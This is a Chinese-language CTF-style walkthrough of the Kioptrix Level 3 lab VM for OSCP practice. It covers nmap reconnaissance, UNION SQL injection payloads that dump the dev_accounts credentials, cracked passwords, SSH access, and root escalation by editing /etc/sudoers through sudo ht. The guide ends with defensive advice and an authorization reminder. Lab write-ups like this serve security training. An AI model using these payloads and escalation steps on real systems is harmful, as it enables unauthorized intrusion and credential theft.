kioptix level 3靶机getshell及提权(按oscp考证要求使用)
字数 1366 2025-08-22 12:23:06
Kioptrix Level 3 靶机渗透测试与提权指南
一、靶机环境搭建
- 下载Kioptrix Level 3靶机镜像
- 在虚拟化平台(如VMware/VirtualBox)中导入靶机
- 确保靶机与攻击机(Kali Linux)在同一网络段
二、信息收集阶段
1. 网络扫描
nmap -sn 192.168.108.0/24
- 确定靶机IP地址(本例中为192.168.108.137)
- 排除已知IP(如Kali Linux的192.168.108.130)
2. 端口与服务扫描
nmap -p 1-65535 192.168.108.137
nmap -sV 192.168.108.137
扫描结果:
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
3. 详细指纹识别
nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all
操作系统信息:
- OS CPE: cpe:/o:linux:linux_kernel:2.6
- OS details: Linux 2.6.9 - 2.6.33
三、Web应用渗透
1. 访问Web服务
- 发现登录框,尝试弱口令无果
- 发现某些页面无法正常访问,可能是DNS解析问题
2. 配置DNS解析
Linux环境:
sudo vim /etc/hosts
添加:
192.168.108.137 kioptrix3.com
Windows环境:
- 清除浏览器缓存
- 编辑C:\Windows\System32\drivers\etc\hosts文件
- 添加相同条目
3. 发现SQL注入漏洞
- 发现URL中存在id参数
- 测试注入点:
发现报错,确认存在SQL注入漏洞id=2 id=1'
4. 利用SQL注入获取数据库信息
爆列数:
?id=1 order by 7--
爆行数:
?id=2 union select 1,2,3,4,5,6--
爆数据库名:
?id=2 union select 1,database(),3,4,5,6--
结果:gallery
爆表名:
?id=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--
爆列名:
?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--
获取用户凭证:
?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--
结果:
- 用户名:dreg, loneferret
- MD5哈希密码:0d3eccfb887aabd50f243b3f155c0f8, 5badcaf789d3d1d09794d8f021f40f0e
- 破解后明文密码:Mast3r, starwars
四、系统访问
1. SSH登录
由于OpenSSH版本较旧,需要使用特定算法:
ssh -o HostKeyAlgorithms=+ssh-rsa loneferret@192.168.108.137
密码:starwars
2. 检查系统文件
发现重要文件:
- checksec.sh
- CompanyPolicy.README
五、权限提升
1. 使用sudo ht提权
- 执行:
sudo ht
- 如果遇到环境变量问题:
export TERM=xterm
-
在ht编辑器界面:
- 按F3搜索
- 输入/etc/sudoers
- 添加
loneferret ALL=(ALL) /bin/bash - 按F10保存退出
-
执行:
sudo /bin/bash
成功获取root权限
六、关键要点总结
- 信息收集:全面的nmap扫描是渗透测试的基础
- Web渗透:
- 注意URL参数可能存在的注入点
- 系统性的SQL注入测试方法
- 凭证破解:MD5哈希可通过在线工具或字典破解
- SSH连接:旧版本可能需要特殊参数
- 权限提升:
- 检查sudo权限
- 利用文本编辑器提权是常见方法
- 注意环境变量设置
七、防御建议
- 及时更新系统和软件版本
- 对用户输入进行严格过滤,防止SQL注入
- 使用强密码策略,避免使用弱密码
- 限制sudo权限,避免普通用户通过编辑器获取root权限
- 定期检查系统配置文件和权限设置
八、注意事项
- 实际渗透测试中必须获得授权
- OSCP考试中不允许使用外部工具(如GPT)
- 所有技术仅用于合法授权的安全测试和学习目的